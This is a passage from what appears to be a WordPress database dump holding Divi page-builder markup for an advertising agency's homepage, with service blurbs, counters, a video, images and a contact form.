box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 21:10:37','2020-08-06 21:10:37','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(454,1,'2020-08-06 21:12:29','2020-08-06 21:12:29','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column 